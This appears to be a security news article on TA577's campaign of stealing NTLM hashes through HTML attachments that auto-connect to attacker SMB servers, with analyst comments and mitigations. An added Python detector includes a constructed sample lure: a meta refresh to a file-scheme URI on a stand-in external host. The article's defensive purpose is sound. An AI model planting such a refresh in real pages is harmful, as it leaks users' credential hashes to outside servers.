Hundreds of Orgs Targeted With Emails Aimed at Stealing NTLM Authentication Hashes


A threat actor specializing in establishing initial access to target organizations’ computer systems and networks is using booby-trapped email attachments to steal employees’ NTLM hashes. NT LAN Manager (NTLM) hashes contain users’ (encoded) passwords. “User authentication in Windows is used to prove to a remote system that a user is who they say they are. NTLM does this by proving knowledge of a password during a challenge and response exchange without revealing the password to anyone,” Microsoft said in a recent post announcing its goal to deprecate NTLM in favor of Kerberos – a more modern, extensible, and secure authentication protocol. “These hashes could be exploited for password cracking or facilitate ‘Pass-The-Hash’ attacks using other vulnerabilities within the targeted organization to move laterally within an impacted environment,” Proofpoint researchers have noted. (Cracking the password is not, by itself, enough to gain access to accounts that have multi-factor authentication switched on.)

According to the researchers, in late February 2024 the threat actor (tracked as TA577) sent out tens of thousands of emails targeting employees of hundreds of organizations around the world. The emails looked like replies to previous emails and directed the potential victims to download and open the attached ZIP archive file. “When opened, the HTML file triggered a system connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. That is, the file would automatically contact an external SMB resource owned by the threat actor,” the researchers explained. No actual malware was used in the attack – the attackers only wanted their SMB server to capture the NTLMv2 challenge/response pairs sent by the victim’s machine, and so steal NTLM hashes. “Any allowed connection attempt to these SMB servers could potentially compromise NTLM hashes, along with revealing other sensitive information such as computer names, domain names, and usernames in clear text,” they noted. TA577 is known for delivering malware loaders – QBot (Qakbot) in the past and, more recently, Pikabot – but this is the first time they’ve been spotted trying to steal NTLM credentials.
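To illustrate what a mail gateway or sandbox can look for in such an attachment, here is an added detection example (not Proofpoint’s or the campaign’s code): it parses an HTML file, pulls the target of any meta refresh, and flags targets that use the file scheme (or a UNC path) and name a host outside the local network. The sample attachment, the host name files.example.net and the rule that single-label names and drive letters count as local are all constructed assumptions.

```python
"""Flag HTML attachments whose meta refresh points at a remote file-scheme (SMB) URI."""
import ipaddress
import re
from html.parser import HTMLParser

class _MetaRefreshCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.targets = []          # url= values of every <meta http-equiv="refresh">

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # HTMLParser lowercases names
        if tag != "meta" or a.get("http-equiv", "").lower() != "refresh":
            return
        m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())

def file_uri_targets(html):
    """Return (host, path) for each refresh target using the file scheme or a UNC path."""
    p = _MetaRefreshCollector()
    p.feed(html)
    out = []
    for t in p.targets:
        t = t.replace("\\", "/")                      # \\host\share -> //host/share
        if t.startswith("//"):
            t = "file:" + t
        if t.lower().startswith("file:"):
            host, _, path = t[5:].lstrip("/").partition("/")
            out.append((host.lower(), "/" + path))
    return out

def is_external_host(host):
    """True for a public IP or a dotted name. Assumption: single-label names and
    drive letters (e.g. 'C:') are local shares or local files, so they are not flagged."""
    if not host or host.endswith(":") or host == "localhost":
        return False
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return "." in host

def flag_attachment(html):
    """External file-scheme targets found in the attachment; a non-empty list means alert."""
    return [(h, p) for h, p in file_uri_targets(html) if is_external_host(h)]

# Constructed sample (not from the campaign): refresh to a .txt on an external host.
SAMPLE_HTML = ('<html><head><meta http-equiv="refresh" content="0; '
               'url=file://files.example.net/share/doc.txt"></head></html>')
```

A hit here is a reason to quarantine the attachment and to check egress logs for TCP 445 connections from the recipient’s host around delivery time.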

Security Officer Comments:
TA577 has been known for infecting systems with trojan malware, but this campaign to steal NTLM hashes indicates the group may be looking for new methods of compromising business systems. As in previous campaigns, their initial access strategy relies on malvertising or malspam delivered via email and occasionally through search ads, and they often use TTPs such as spearphishing. In this instance they did so by masquerading as replies to previously sent emails. The absence of a trojan in this campaign may be evidence that they are using cyber espionage to scope out viable targets while testing new delivery methods by casting a wide net.

Suggested Corrections:
Researchers noted “an increase in multiple threat actors abusing file scheme URIs to direct recipients to external file shares such as SMB and WebDAV to access remote content for malware delivery.” To foil those attempts, they advised, organizations should block outbound SMB connections. “Disabling guest access to SMB does not mitigate the attack, since the file must attempt to authenticate to the external SMB server to determine if it should use guest access,” the researchers added.